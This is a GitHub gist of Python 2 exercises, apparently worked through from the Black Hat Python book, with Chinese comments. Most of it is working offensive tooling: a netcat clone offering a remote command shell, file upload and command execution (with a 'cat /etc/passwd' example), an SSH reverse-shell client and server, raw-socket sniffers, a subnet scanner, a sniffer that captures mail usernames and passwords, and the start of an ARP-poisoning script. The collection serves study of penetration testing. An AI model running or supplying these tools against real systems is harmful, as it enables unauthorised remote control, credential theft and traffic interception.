Created
September 22, 2017 19:37
-
-
Save ttcmk/9f46ab510dac3e5a0502ab17b2a2d8b0 to your computer and use it in GitHub Desktop.
Python Black Hat
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<module type="PYTHON_MODULE" version="4"> | |
<component name="NewModuleRootManager"> | |
<content url="file://$MODULE_DIR$" /> | |
<orderEntry type="inheritedJdk" /> | |
<orderEntry type="sourceFolder" forTests="false" /> | |
</component> | |
</module> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="ProjectRootManager" version="2" project-jdk-name="Python 3.5.2 (/Library/Frameworks/Python.framework/Versions/3.5/bin/python3.5)" project-jdk-type="Python SDK" /> | |
</project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="UTF-8"?> | |
<project version="4"> | |
<component name="ProjectModuleManager"> | |
<modules> | |
<module fileurl="file://$PROJECT_DIR$/.idea/BlackHat_Python.iml" filepath="$PROJECT_DIR$/.idea/BlackHat_Python.iml" /> | |
</modules> | |
</component> | |
</project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
def sum(number_one, number_two): | |
number_one = convert_integer(number_one) | |
number_two = convert_integer(number_two) | |
result = number_one + number_two | |
return result | |
def convert_integer(number_string): | |
converted_integer = int(number_string) | |
return converted_integer | |
answer = sum("2","1") | |
print answer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
target_host = "0.0.0.0" | |
target_port = 9999 | |
# 建立一个 socket 对象 | |
# AF_INET --- IPv4 address | |
# SOCK_STREAM --- TCP connection | |
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
# 连接客户端 | |
client.connect((target_host,target_port)) | |
# 发送一些数据 | |
client.send("GET / HTTP/1.1\r\nHost: google.com\r\n\r\n") | |
# 接收一些数据 | |
response = client.recv(4096) | |
print response |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
import threading | |
bind_ip = "0.0.0.0" | |
bind_port = 9999 | |
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
server.bind((bind_ip,bind_port)) | |
server.listen(5) | |
print "[*] Listening on %s:%d" % (bind_ip, bind_port) | |
# 客户端处理线程 | |
def handle_client(client_socket): | |
# 打印客户端发送得到的内容 | |
request = client_socket.recv(1024) | |
print "[*] Received: %s" % request | |
# 返还一个数据包 | |
client_socket.send("ACK!") | |
client_socket.close() | |
while True: | |
client, addr = server.accept() | |
print "[*] Accepted connection from: %s:%d" % (addr[0], addr[1]) | |
# 挂起客户端线程,处理传入的数据 | |
client_handler = threading.Thread(target=handle_client, args=(client,)) | |
client_handler.start() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
target_host = "127.0.0.1" | |
target_port = 80 | |
# 建立一个 socket 对象 | |
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
# 发送一些数据 | |
client.sendto("AAAABBBBCCCC",(target_host,target_port)) | |
# 接收一些数据 | |
data, addr = client.recvfrom(4096) | |
print data |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import sys | |
import socket | |
import getopt # 接收命令行参数 | |
import threading | |
import subprocess | |
# 定义一些全局变量 | |
listen = False | |
command = False | |
upload = False | |
execute = "" | |
target = "" | |
upload_destination = "" | |
port = 0 | |
def usage(): | |
print "FuzzyPants Net Tool" | |
print "\n" | |
print "Usage: netcat.py -t target_host -p port" | |
print "-l --listen - listen on [host]:[port] " \ | |
"for incoming connections" | |
print "-e --execute=file_to_run - execute the given file " \ | |
"upon receiving a connection" | |
print "-c --command - initialize a command shell" | |
print "-u --upload=destination - upon receiving connection " \ | |
"upload a file and write to [destination]" | |
print "\n" | |
print "Examples: " | |
print "netcat.py -t 192.168.0.1 -p 5555 -l -c" | |
print "netcat.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe" | |
print "netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"" | |
print "echo 'ABCDEFG' | ./netcat.py -t 192.168.11.12 -p 135" | |
sys.exit(0) | |
def main(): | |
global listen | |
global port | |
global execute | |
global command | |
global upload_destination | |
global target | |
if not len(sys.argv[1:]): | |
usage() | |
# 读取命令行选项 | |
# hle:t:p:cu --- 一一对应长格式中的单词,但h、l以及c这三个不带参数,所以不加冒号 | |
# 长格式中,若需要加参数,则应该写为 "port=" | |
# 返回值 opts 是一个包含元组的列表,每个元组是分析出的格式信息,比如[('-i','127.0.0.1'),('-p','80')] | |
# 返回值 args 是个列表,包含没有 '-' 或者 '--'的参数 | |
try: | |
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu", | |
["help","listen","execute","target", | |
"port","command","upload"]) | |
except getopt.GetoptError as err: | |
print str(err) | |
usage() | |
for o,a in opts: | |
if o in ("-h","--help"): | |
usage() | |
elif o in ("-l","--listen"): | |
listen = True | |
elif o in ("-e", "--execute"): | |
execute = a | |
elif o in ("-c", "--command"): | |
command = True | |
elif o in ("-u", "--upload"): | |
upload_destination = a | |
elif o in ("-t", "--target"): | |
target = a | |
elif o in ("-p", "--port"): | |
port = int(a) | |
else: | |
assert False, "Unhandled Option" | |
def client_sender(buffer): | |
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
try: | |
# connect to the target host | |
client.connect((target,port)) | |
if len(buffer): | |
client.send(buffer) | |
while True: | |
# 等待回传数据 | |
recv_len = 1 | |
response = "" | |
while recv_len: | |
data = client.recv(4096) | |
recv_len = len(data) | |
response += data | |
if recv_len < 4096: | |
break | |
print response, | |
# 等待更多输入 | |
buffer = raw_input("") | |
buffer += "\n" | |
# 发送出去 | |
client.send(buffer) | |
except: | |
print "[*] Exception Exiting." | |
# 关闭连接 | |
client.close() | |
def server_loop(): | |
global target | |
# 如果没有指定目标,那么我们监听所有接口 | |
if not len(target): | |
target = "0.0.0.0" | |
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM) | |
server.bind((target,port)) | |
server.listen(5) | |
while True: | |
client_socket, addr = server.accept() | |
# 分拆一个线程处理新的客户端 | |
client_thread = threading.Thread(target=client_handler, args=(client_socket,)) | |
client_thread.start() | |
def run_command(command): | |
# 换行 | |
command = command.rstrip() | |
# 运行命令并将输出返回 | |
try: | |
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True) | |
except: | |
output = "Failed to execute command.\r\n" | |
# 将输出发送 | |
return output | |
def client_handler(client_socket): | |
global upload | |
global execute | |
global command | |
# 上传文件 | |
if len(upload_destination): | |
# 读取所有的字符并写下目标 | |
file_buffer = "" | |
# 持续读取数据直到没有符合的数据 | |
while True: | |
data = client_socket.recv(1024) | |
if not data: | |
break | |
else: | |
file_buffer += data | |
# 接收这些数据并将它们写出来 | |
try: | |
file_description = open(upload_destination,"wb") | |
file_description.write(file_buffer) | |
file_description.close() | |
# 确认文件已经写出来了 | |
client_socket.send("Successfully saved file to %s\r\n" % upload_destination) | |
except: | |
client_socket.send("Failed to save file to %s\r\n" % upload_destination) | |
# 命令执行 | |
if len(execute): | |
# 运行命令 | |
output = run_command(execute) | |
client_socket.send(output) | |
# 如果需要一个命令行shell,则进入另一个循环 | |
# 正向shell | |
if command: | |
while True: | |
# 跳出一个窗口 | |
client_socket.send("<BHP:#> ") | |
# 接收文件直至遇到换行符 | |
cmd_buffer = "" | |
while "\n" not in cmd_buffer: | |
cmd_buffer += client_socket.recv(1024) | |
# 返回命令输出 | |
response = run_command(cmd_buffer) | |
# 返回响应数据 | |
client_socket.send(response) | |
# 我们是进行监听还是从标准输入发送数据? | |
if not listen and len(target) and port > 0: | |
# 从命令行读取内存数据 | |
# 这里将阻塞,所以不再向标准输入发送数据时发送 CTRL + D | |
buffer = sys.stdin.read() | |
# 发送数据 | |
client_sender(buffer) | |
# 我们开始监听并准备上传文件、执行命令 | |
# 放置一个反弹shell | |
# 取决于上面的命令行选项 | |
if listen: | |
server_loop() | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import sys | |
import socket | |
import threading | |
def server_loop(local_host, local_port, remote_host, remote_port, receive_first): | |
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
try: | |
server.bind((local_host, local_port)) | |
except: | |
print "[!!] Failed to listen on %s:%d" % (local_host, local_port) | |
print "[!!] Check for other listening sockets or correct permissions." | |
sys.exit(0) | |
print "[*] Listening on %s:%d" % (local_host, local_port) | |
server.listen(5) | |
while True: | |
client_socket, addr = server.accept() | |
# 打印出本地连接信息 | |
print "[==>] Received incoming connection from %s:%d" % (addr[0], addr[1]) | |
# 开启一个线程与远程主机通信 | |
proxy_thread = threading.Thread(target=proxy_handler, | |
args=(client_socket, remote_host, remote_port, receive_first)) | |
proxy_thread.start() | |
def hexdump(src, length=16): | |
result = [] | |
digits = 4 if isinstance(src, unicode) else 2 | |
# %X -- 无符号整数(十六进制大写) | |
# %04X -- "0"告诉python用前导0填充数字,"4"表示输出4位 | |
# "*" -- 定义宽度或者小数点精度,在print %()中要占一位参数,比如"%0*X" % (digits, ord(x)) == "%0digitsX" % ord(x) | |
# %-*s -- "-"表示左对齐 | |
# "+"表示显示正负符号 | |
for i in xrange(0, len(src), length): | |
s = src[i:i + length] | |
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s]) | |
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s]) | |
result.append(b"%04X %-*s %s" % (i, length * (digits + 1), hexa, text)) | |
print b'\n'.join(result) | |
def receive_from(connection): | |
buffer = "" | |
# 设置两秒的超时,这取决于目标的情况,可能需要调整 | |
connection.settimeout(2) | |
try: | |
# 持续从缓存中读取数据直到没有数据或者超时 | |
while True: | |
data = connection.recv(4096) | |
if not data: | |
break | |
buffer += data | |
except: | |
pass | |
return buffer | |
# 对目标主机是远程主机的请求进行修改 | |
def request_handler(buffer): | |
# 执行包修改 --- | |
return buffer | |
# 对目标主机是本地主机的响应进行修改 | |
def response_handler(buffer): | |
# 执行包修改 --- | |
return buffer | |
def proxy_handler(client_socket, remote_host, remote_port, receive_first): | |
# 连接远程主机 | |
remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
remote_socket.connect((remote_host, remote_port)) | |
# 如果必要,从远程主机接收数据 | |
if receive_first: | |
remote_buffer = receive_from(remote_socket) | |
hexdump(remote_buffer) | |
# 发送给我们的响应处理 | |
remote_buffer = response_handler(remote_buffer) | |
# 如果我们有数据传递给本地客户端,发送它: | |
if len(remote_buffer): | |
print "[<==] Sending %d bytes to localhost." % len(remote_buffer) | |
client_socket.send(remote_buffer) | |
# 从本地循环读取数据,发送给远程主机和本地主机 | |
while True: | |
# 从本地读取数据 | |
local_buffer = receive_from(client_socket) | |
if len(local_buffer): | |
print "[==>] Received %d bytes from localhost." % len(local_buffer) | |
hexdump(local_buffer) | |
# 发送给本地请求 | |
local_buffer = request_handler(local_buffer) | |
# 向远程主机发送数据 | |
remote_socket.send(local_buffer) | |
print "[==>] Sent to remote." | |
# 接收响应的数据 | |
remote_buffer = receive_from(remote_socket) | |
if len(remote_buffer): | |
print "[<==] Received %d bytes from remote." % len(remote_buffer) | |
hexdump(remote_buffer) | |
# 发送响应处理函数 | |
remote_buffer = response_handler(remote_buffer) | |
# 将响应发送给本地socket | |
client_socket.send(remote_buffer) | |
print "[<==] Sent to localhost." | |
# 如果两边都没有数据,关闭连接 | |
if not len(local_buffer) or not len(remote_buffer): | |
client_socket.close() | |
remote_socket.close() | |
print "[*] No more data. Closing connections." | |
break | |
def main(): | |
# 没有华丽的命令行解析 | |
if len(sys.argv[1:]) != 5: | |
print "Usage: python TCP_Proxy.py [localhost] [localport] [remotehost] [remoteport] [receive_first]" | |
print "Example: python TCP_Proxy.py 127.0.0.1 9000 10.12.132.1 9000 True" | |
sys.exit(0) | |
# 设置本地监听参数 | |
local_host = sys.argv[1] | |
local_port = int(sys.argv[2]) | |
# 设置远程目标 | |
remote_host = sys.argv[3] | |
remote_port = int(sys.argv[4]) | |
# 告诉代理在发送给远程主机之前连接和接受数据 | |
receive_first = sys.argv[5] | |
if "True" in receive_first: | |
receive_first = True | |
else: | |
receive_first = False | |
# 设置监听socket | |
server_loop(local_host, local_port, remote_host, remote_port, receive_first) | |
if __name__ == '__main__': | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import threading | |
import paramiko | |
import subprocess | |
def ssh_command(ip, user, passwd, command): | |
client = paramiko.SSHClient() | |
# client.load_host_keys('/home/justin/.ssh/known_hosts') | |
client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
client.connect(ip, username=user, password=passwd) | |
ssh_session = client.get_transport().open_seesion() | |
if ssh_session.active: | |
ssh_session.exec_command(command) | |
print ssh_session.recv(1024) | |
return | |
if __name__ == '__main__': | |
ssh_command('192.168.100.131', 'justin', 'lovesthepython', 'id') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import threading | |
import paramiko | |
import subprocess | |
def ssh_command(ip, user, passwd, command): | |
client = paramiko.SSHClient() | |
# client.load_host_keys('/home/justin/.ssh/known_hosts') | |
client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) | |
client.connect(ip, username=user, password=passwd) | |
ssh_session = client.get_transport().open_session() | |
if ssh_session.active: | |
ssh_session.send(command) | |
print ssh_session.recv(1024) # read banner | |
while True: | |
command = ssh_session.recv(1024) # get the command from the SSH server | |
try: | |
cmd_output = subprocess.check_output(command, shell=True) | |
ssh_session.send(cmd_output) | |
except Exception, e: | |
ssh_session.send(str(e)) | |
client.close() | |
return | |
if __name__ == '__main__': | |
ssh_command('192.168.100.130', 'justin', 'passwd', 'ClientConnected') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
import paramiko | |
import threading | |
import sys | |
# 使用Paramiko 示例文件的密钥 | |
host_key = paramiko.RSAKey(filename='test_rsa.key') | |
class Server(paramiko.ServerInterface): | |
def __init__(self): | |
self.event = threading.Event() | |
def check_channel_request(self, kind, chanid): | |
if kind == 'session': | |
return paramiko.OPEN_SUCCEEDED | |
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED | |
def check_auth_password(self, username, password): | |
if (username == 'justin') and (password == 'lovesthepython'): | |
return paramiko.AUTH_SUCCESSFUL | |
return paramiko.AUTH_FAILED | |
server = sys.argv[1] | |
ssh_port = int(sys.argv[2]) | |
try: | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
sock.bind((server, ssh_port)) | |
sock.listen(100) | |
print '[+] Listening for connection ...' | |
client, addr = sock.accept() | |
except Exception, e: | |
print '[-] Listen failed: ' + str(e) | |
sys.exit(1) | |
print '[+] Got a connection!' | |
try: | |
bhSession = paramiko.Transport(client) | |
bhSession.add_server_key(host_key) | |
server = Server() | |
try: | |
bhSession.start_server(server=server) | |
except paramiko.SSHException, x: | |
print '[-] SSH negotiation failed.' | |
chan = bhSession.accept(20) | |
print '[+] Authenticated!' | |
print chan.recv(1024) | |
chan.send('Welcome to bh_ssh') | |
while True: | |
try: | |
command = raw_input("Enter command: ").strip('\n') | |
if command != 'exit': | |
chan.send(command) | |
print chan.recv(1024) + '\n' | |
else: | |
chan.send('exit') | |
print 'exiting' | |
bhSession.close() | |
raise Exception('exit') | |
except KeyboardInterrupt: | |
bhSession.close() | |
except Exception, e: | |
print '[-] Caught exception: ' + str(e) | |
try: | |
bhSession.close() | |
except: | |
pass | |
sys.exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
import os | |
# 监听的主机 | |
host = "192.168.1.10" | |
# 创建原始套接字,然后绑定在公开的接口上 | |
if os.name == "nt": | |
socket_protocol = socket.IPPROTO_IP | |
else: | |
socket_protocol = socket.IPPROTO_ICMP | |
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) | |
sniffer.bind((host, 0)) | |
# 设置在捕获的数据包中包含IP头 | |
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) | |
# 在windows平台上,设置 IOCTL 以启用混杂模式 | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) | |
# 读取单个数据包 | |
print sniffer.recvfrom(65565) | |
# 在windows平台上,关闭混杂模式 | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
import os | |
import struct | |
from ctypes import * | |
import threading | |
import time | |
from netaddr import IPNetwork, IPAddress | |
# 监听的主机 | |
host = "192.168.1.10" | |
# 扫描的目标子网 | |
subnet = "10.10.10.0/24" | |
# 自定义的字符串,将在ICMP响应中进行核对 | |
magic_message = "PYTHONRULES!" | |
# 批量发送UDP数据包 | |
def udp_sender(subnet, magic_message): | |
time.sleep(5) | |
sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
for ip in IPNetwork(subnet): | |
try: | |
sender.sendto(magic_message, ("%s" % ip, 65212)) | |
except: | |
pass | |
# 64位机器:c_ushort -> c_uint16; c_ulong -> c_uint32 | |
# IP的定义 | |
class IP(Structure): | |
_fields_ = [ | |
("ihl", c_ubyte, 4), | |
("version", c_ubyte, 4), | |
("tos", c_ubyte), | |
# ("len", c_ushort), | |
("len", c_uint16), | |
# ("id", c_ushort), | |
("id", c_uint16), | |
# ("offset", c_ushort), | |
("offset", c_uint16), | |
("ttl", c_ubyte), | |
("protocol_num", c_ubyte), | |
# ("sum", c_ushort), | |
("sum", c_uint16), | |
# ("src", c_ulong), | |
("src", c_uint32), | |
# ("dst", c_ulong) | |
("dst", c_uint32) | |
] | |
def __new__(self, socket_buffer=None): | |
return self.from_buffer_copy(socket_buffer) | |
def __init__(self, socket_buffer=None): | |
# 协议字段与协议名称对应 | |
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"} | |
# 可读性更强的IP地址 | |
self.src_address = socket.inet_ntoa(struct.pack("<L", self.src)) | |
self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst)) | |
# 协议类型 | |
try: | |
self.protocol = self.protocol_map[self.protocol_num] | |
except: | |
self.protocol = str(self.protocol_num) | |
class ICMP(Structure): | |
_fields_ = [ | |
("type", c_ubyte), | |
("code", c_ubyte), | |
# ("checksum", c_ushort), | |
# ("unused", c_ushort), | |
# ("next_hop_mtu", c_ushort) | |
("checksum", c_uint16), | |
("unused", c_uint16), | |
("next_hop_mtu", c_uint16) | |
] | |
def __new__(self, socket_buffer): | |
return self.from_buffer_copy(socket_buffer) | |
def __init__(self, socket_buffer): | |
pass | |
t = threading.Thread(target=udp_sender, args=(subnet, magic_message)) | |
t.start() | |
if os.name == "nt": | |
socket_protocol = socket.IPPROTO_IP | |
else: | |
socket_protocol = socket.IPPROTO_ICMP | |
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) | |
sniffer.bind((host, 0)) | |
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) | |
try: | |
while True: | |
# 读取数据包 | |
raw_buffer = sniffer.recvfrom(65565)[0] | |
# 将缓冲区的前20个字节按IP头进行解析 | |
ip_header = IP(raw_buffer[0:20]) | |
# 输出协议和通信双方的IP地址 | |
print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address) | |
if ip_header.protocol == "ICMP": | |
# 计算ICMP包的起始位置 | |
offset = ip_header.ihl * 4 | |
buf = raw_buffer[offset:offset + sizeof(ICMP)] | |
# 解析ICMP数据 | |
icmp_header = ICMP(buf) | |
# print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code) | |
# 检查类型和代码是否为3 --- 目标不可达,说明主机是存活的 | |
if icmp_header.code == 3 and icmp_header.type == 3: | |
# 确认响应的主机在我们的目标子网之内 | |
if IPAddress(ip_header.src_address) in IPNetwork(subnet): | |
# 确认ICMP数据中包含之前发送的magic_message | |
if raw_buffer[len(raw_buffer) - len(magic_message):] == magic_message: | |
print "Host UP: %s" % ip_header.src_address | |
# 处理CTRL-C | |
except KeyboardInterrupt: | |
# 如果运行在Windows主机上,关闭混杂模式 | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
import os | |
import struct | |
from ctypes import * | |
# 监听的主机 | |
host = "192.168.1.10" | |
# IP的定义 | |
class IP(Structure): | |
_fields_ = [ | |
("ihl", c_ubyte, 4), | |
("version", c_ubyte, 4), | |
("tos", c_ubyte), | |
("len", c_ushort), | |
("id", c_ushort), | |
("offset", c_ushort), | |
("ttl", c_ubyte), | |
("protocol_num", c_ubyte), | |
("sum", c_ushort), | |
("src", c_ulong), | |
("dst", c_ulong) | |
] | |
def __new__(self, socket_buffer=None): | |
return self.from_buffer_copy(socket_buffer) | |
def __init__(self, socket_buffer=None): | |
# 协议字段与协议名称对应 | |
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"} | |
# 可读性更强的IP地址 | |
self.src_address = socket.inet_ntoa(struct.pack("<L", self.src)) | |
self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst)) | |
# 协议类型 | |
try: | |
self.protocol = self.protocol_map[self.protocol_num] | |
except: | |
self.protocol = str(self.protocol_num) | |
if os.name == "nt": | |
socket_protocol = socket.IPPROTO_IP | |
else: | |
socket_protocol = socket.IPPROTO_ICMP | |
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) | |
sniffer.bind((host, 0)) | |
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) | |
try: | |
while True: | |
# 读取数据包 | |
raw_buffer = sniffer.recvfrom(65565)[0] | |
# 将缓冲区的前20个字节按IP头进行解析 | |
ip_header = IP(raw_buffer[0:20]) | |
# 输出协议和通信双方的IP地址 | |
print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address) | |
# 处理CTRL-C | |
except KeyboardInterrupt: | |
# 如果运行在Windows主机上,关闭混杂模式 | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
import socket | |
import os | |
import struct | |
from ctypes import * | |
# 监听的主机 | |
host = "192.168.1.10" | |
# 64位机器:c_ushort -> c_uint16; c_ulong -> c_uint32 | |
# IP的定义 | |
class IP(Structure): | |
_fields_ = [ | |
("ihl", c_ubyte, 4), | |
("version", c_ubyte, 4), | |
("tos", c_ubyte), | |
# ("len", c_ushort), | |
("len", c_uint16), | |
# ("id", c_ushort), | |
("id", c_uint16), | |
# ("offset", c_ushort), | |
("offset", c_uint16), | |
("ttl", c_ubyte), | |
("protocol_num", c_ubyte), | |
# ("sum", c_ushort), | |
("sum", c_uint16), | |
# ("src", c_ulong), | |
("src", c_uint32), | |
# ("dst", c_ulong) | |
("dst", c_uint32) | |
] | |
def __new__(self, socket_buffer=None): | |
return self.from_buffer_copy(socket_buffer) | |
def __init__(self, socket_buffer=None): | |
# 协议字段与协议名称对应 | |
self.protocol_map = {1: "ICMP", 6: "TCP", 17: "UDP"} | |
# 可读性更强的IP地址 | |
self.src_address = socket.inet_ntoa(struct.pack("<L", self.src)) | |
self.dst_address = socket.inet_ntoa(struct.pack("<L", self.dst)) | |
# 协议类型 | |
try: | |
self.protocol = self.protocol_map[self.protocol_num] | |
except: | |
self.protocol = str(self.protocol_num) | |
class ICMP(Structure): | |
_fields_ = [ | |
("type", c_ubyte), | |
("code", c_ubyte), | |
# ("checksum", c_ushort), | |
# ("unused", c_ushort), | |
# ("next_hop_mtu", c_ushort) | |
("checksum", c_uint16), | |
("unused", c_uint16), | |
("next_hop_mtu", c_uint16) | |
] | |
def __new__(self, socket_buffer): | |
return self.from_buffer_copy(socket_buffer) | |
def __init__(self, socket_buffer): | |
pass | |
if os.name == "nt": | |
socket_protocol = socket.IPPROTO_IP | |
else: | |
socket_protocol = socket.IPPROTO_ICMP | |
sniffer = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket_protocol) | |
sniffer.bind((host, 0)) | |
sniffer.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON) | |
try: | |
while True: | |
# 读取数据包 | |
raw_buffer = sniffer.recvfrom(65565)[0] | |
# 将缓冲区的前20个字节按IP头进行解析 | |
ip_header = IP(raw_buffer[0:20]) | |
# 输出协议和通信双方的IP地址 | |
print "Protocol: %s %s -> %s" % (ip_header.protocol, ip_header.src_address, ip_header.dst_address) | |
if ip_header.protocol == "ICMP": | |
# 计算ICMP包的起始位置 | |
offset = ip_header.ihl * 4 | |
buf = raw_buffer[offset:offset + sizeof(ICMP)] | |
# 解析ICMP数据 | |
icmp_header = ICMP(buf) | |
print "ICMP -> Type: %d Code: %d" % (icmp_header.type, icmp_header.code) | |
# 处理CTRL-C | |
except KeyboardInterrupt: | |
# 如果运行在Windows主机上,关闭混杂模式 | |
if os.name == "nt": | |
sniffer.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from scapy.all import * | |
# 数据包回调函数 | |
def packet_callback(packet): | |
return packet.show() | |
# 开启嗅探器 | |
# sniff(filter="", iface="any", prn=function, count=N) | |
# filter参数设置一个BPF(wireshark)类型的过滤器,置空则嗅探所有数据包 | |
# iface参数设置所有嗅探的网卡,留空则对所有网卡进行嗅探 | |
# prn参数指定嗅探到指定条件的数据包时所调用的回调函数,这个回调函数以接收到的数据包对象作为唯一参数 | |
# count参数设置嗅探的数据包个数,为空则无限 | |
# 安装遇到错误:http://blog.csdn.net/marywang56/article/details/75314967 | |
sniff(prn=packet_callback, count=1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from scapy.all import * | |
# 数据包回调函数 | |
def packet_callback(packet): | |
if packet[TCP].payload: | |
mail_packet = str(packet[TCP].payload) | |
if "user" in mail_packet.lower() or "pass" in mail_packet.lower(): | |
print "[*] Server: %s" % packet[IP].dst | |
print "[*] %s" % packet[TCP].payload | |
# 开启嗅探器 | |
# store=0 --- 不会在内存中保存数据包 | |
sniff(filter="tcp port 110 or tcp port 25 or tcp port 143", prn=packet_callback, store=0) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
from scapy.all import * | |
import os | |
import sys | |
import threading | |
import signal | |
# 运行前,Mac:sudo sysctl -w net.inet.ip.forwarding=1 | |
# Linux: echo 1 > /proc/sys/net/ipv4/ip_forward | |
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac): | |
# 以下代码中调用send函数的方式稍有不同 | |
print "[*] Restoring target... " | |
send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5) | |
send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5) | |
# 发送退出信号到主线程 | |
os.kill(os.getpid(), signal.SIGINT) | |
